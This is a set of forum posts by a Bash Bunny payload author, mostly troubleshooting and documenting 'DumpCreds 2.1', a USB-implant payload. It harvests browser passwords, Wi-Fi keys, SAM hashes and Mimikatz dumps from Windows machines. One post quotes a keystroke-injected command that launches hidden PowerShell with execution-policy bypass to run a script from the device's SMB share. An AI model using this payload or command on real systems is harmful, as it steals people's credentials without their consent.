qdba
-
Posts
87 -
Joined
-
Last visited
-
Days Won
2
Everything posted by qdba
-
Hello, At the moment I'm writing an extension which give some debug information during a payload run. The function START_DEBUG "tail " the /var/log/syslog to /tmp/log.txt (I won't create a extra file because syslog give al lot of more useful information in background.) During payload run I can output some information to syslog with logger With STOP_DEBUG I stop the "tail", test if the /dev/nandf is mounted. If so I Copy /tmp/log.txt to /root/disk/loot. /If not I mount the /dev/nandf to /root/udisk, copy the file, do a sync and unmount the /dev/nandf. Now the Problem. It happens often that when I look in the loot file there is no log file and the FS is corrupted. This happens even I do a sync; sleep 1; sync after copy the file and befor unmounting the FS It seems tha the FS is not unmunted correctly. Sometimes the dirty bit is set. Have somebody any idea? payload.txt debug.sh
-
With a Hi Sebkinne, Nice, can't wait for 1.2. I think the idea with a payload timeout is not so bad. . With a special LED state we know if it make sense to wait for a payload to finish or not.
-
Plz. can go to DEBUG mode (create a file named DEBUG in the payload folder. look at the file in the /loot/DumpCred_2.1/log.txt If there is no log..txt take a look at /tmp/log.txt. If there is something like bunny.service timeout or bunny.service failed you propably run into a timeout. This is a Bunny issue in Firmware 1.1 and will bes solved in Fw 1.2 Look there .....
-
hi copy all the *.json files to the language folder of the bunny flash storage. After them boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment i have no bunny to look at)
-
you are right. It's to get rid of team storage mode. I don't know any company who allows Usb storage. the sun ports are almost blocked. so I store the loot to the payload folder and copy it during cleanup to the /loot folder
-
For Responder you don't need any deb Files. Copy the Responder Folder from Tools_Installer payload to <flash_root>\tools end reboot bunny in arming mode. During reboot the bunny move the file to /tools ( <root_of_bunny_linx>/tools (previously known as /pentest) . You need only a deb file if you have some post- or preinstall scripts running after or befor copy the files.
-
DumpCreds_2.1 New Version Changelog Complete new payload.txt code for BashBunny 1.1 Added a lot of debug code into the payload For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1 Impacket.deb included for easy impacket installation Some Ducky languages included (from DuckyInstall Payload)
-
DumpCreds 2.1 Author: QDBA Version: Version 2.1.0 Build 1004 Target: Windows 10 Description ** !!!!! works only at Bash Bunny with FW 1.1 !!!!! ** Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes (only if AdminMode=True) Mimimk@tz Dump (only if AdminMode=True) Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Problems if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded. If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times) If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue) Debug If you want some debug information, create a file with name "DEBUG" in the payload folder you got the debug information in \loot\DumpCred_2.1\log.txt Folder Configuration None needed. Requirements impacket - install it form https://github.com/qdba/MyBashBunny/tree/master/tools Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds Install Put Bash Bunny in arming mode Copy All Folders into the root of Bunny Flash Drive Mandatory * payloads/library/DumpCreds_2.1 --> the payload Files * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload * tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed) Not neccessary * docs --> this doc file * languages --> languauge files for DUCKY_LANG eject Bash Bunny safely!! Insert Bash Bunny in arming mode ( Impacket and languages will be installed ) Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2 eject Bash Bunny safely move switch in right position plugin Bash Bunny and have fun....! :-) STATUS LED Status Magenta Solid Setup Red slow blink Impacket not found Red fast blink Target did not acquire IP address Yellow single blink Initialization Yellow double blink HID Stage Yellow triple blink Wait for IP coming up Yellow quad blink Wait for Handshake (SMBServer Coming up) Yellow very fast blink Powershell scripts running White fast blink Cleanup, copy Files to /loot Green Finished ----------------------- -------------------------------------------- Discussion https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage Credits to...... https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1 Changelog Complete new payload.txt code for BashBunny 1.1 Added a lot of debug code into the payload For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1 Impacket.deb included for easy impacket installation Some Ducky languages included (from DuckyInstall Payload)
-
Can be a runtime problem. With default setting a payload does not run longer than 1min 30s since.(measured since plug in the bunny) After 1min 30 every payload stops working. Check your /var/log/syslog if there is an entry like : bunny.service start operation timed out. Terminating Failed to start bunny.service
-
I'm still running in the payload timeout after 1 Minute. So I did some investigation about it. I made the attached payload.txt for testing. I put the command logger "#### Start Test payload #### at the beginning of the payload and logger "#### End Test payload ####" at the end. So I can examine the syslog what happens during ten payload run. After approx. 1:30 min bunny.service is running into a timeout ......... Apr 6 09:56:52 bunny logger: #### Loop Test payload #### Apr 6 09:56:54 bunny logger: #### Loop Test payload #### Apr 6 09:56:56 bunny logger: #### Loop Test payload #### Apr 6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating. Apr 6 09:56:58 bunny systemd[1]: Failed to start bunny.service. Apr 6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state. Apr 6 09:56:58 bunny systemd[1]: Starting Multi-User System. Apr 6 09:56:58 bunny systemd[1]: Reached target Multi-User System. Apr 6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s. The result of the command systemctl show bunny.service |grep Timeout is TimeoutStartUSec=1min 30s TimeoutStopUSec=1min 30s JobTimeoutUSec=0 Guess this is the reason for the payload timeout. Can anybody confirm this? I willl do more investigations syslog payload.txt ______________________________________________________________________________________________________________________ OK got it..... I insert the value TimeoutSec=5min under the [Service] section of file /lib/systemd/system/bunny.service Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout) Be carefully, I'm not responsible for any damage of the bunny :-) @Darren Kitchen @Sebkinne If you agree (because its part of Firmware) I can make a payload who will patch this. syslog.solved_5min_Timeout
-
There is a Error ( or is it a Feature ). There is a timeout approx. 1 min after this timeout the payload stops. Run attached payload and look at /log.txt The payload stops after a minute payload.txt ------------------------------------[Solved] ------------------------------------------------ Look there --- Gucksch du hier :-)
-
Impacket Tools impacket_0.9.15_1.deb https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/tools Put the deb file into <root>\tools folder - remove Bunny safely - reinsert in arming mode. It will be installed to /tools/impacket.
-
Searching for Language FIles here they are. Exportet from DuckInstall https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/languages Put it into <root>\Language folder - remove Bunny safely - reinsert in arming mode
-
Very nice!! Now let us rewrite some payloads ;-)
-
OK helps a lot. So the handshake Ting works fine. Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen.
-
Are you using Version 2.0.2 Is there an UAC Prompt or a Credential prompt? Guess there is a timing Problem. So the main.ps1 script will not start. LED R G # Wait for Bunny Ethernet and Start main.ps1 Powershell Script Q DELAY 500 <<<<<<<<<<<<<<<<<< Increment to 1500 for testing Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" Q DELAY 1000 Q ENTER Does the main.ps1 script fire up right. Can you see the command in Console? Take care that no other Windows is open on the screen. Works best on pure Desktop.
-
Can you connect to \\172.16.64.1\e from explorer? Is the smbserver.py running ( ssh to Bunny and do a ps -ef |grep smb ) If not see my post above. there is an error in the Impacket installed by tools_installer
-
After a Firmware reset this afternoon, I run in trouble with smbserver.py. He didn't start. The Purple LED blinks slow. Affter some tests I realized that afer run of the tools_installer the things was fine installed, but smbserver.py had ^M at the end of every line. I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g or wth the commands ------------------------------------------------ cd /pentest/impacket/examples cp smbserver.py smbserver.py.sik cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py ----------------------------------------------------------- Now it works again.
-
If you set the IP manually, The var TARGET_IP will not be set by bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working at a extended version for bunny_helpers.sh. Its not an Error of payload. If the LED blinks slow Purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working. If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell. Be sure you have the latest Files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.
-
In Version 2.0.2 it works. In older versions they are truncated.
-
Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)
-
New Version 2.0.2 Changelog: Paralellize Powersploit script, so the payload ist faster. Universal Payload. The payload works no matter if there is a UAC prompt or a credentials prompt.. There is no kind of exploitation. You will not get admin rights if you haven't it before. But without admin rights WifiDump, BrowserDump, Computerinformation works fine. Only for Hashdump and M1m1k@tz you ned admin rights. Install: Copy all files to your switch directory. Don't forget the PS Folder. Downlod: See first Post
-
Thanks..... Done.....
-
New Version 2.0.1 Added: Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
-
Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed in a later version. Guess you have an old one . sorry about it. But anyway fine that you like the payload.
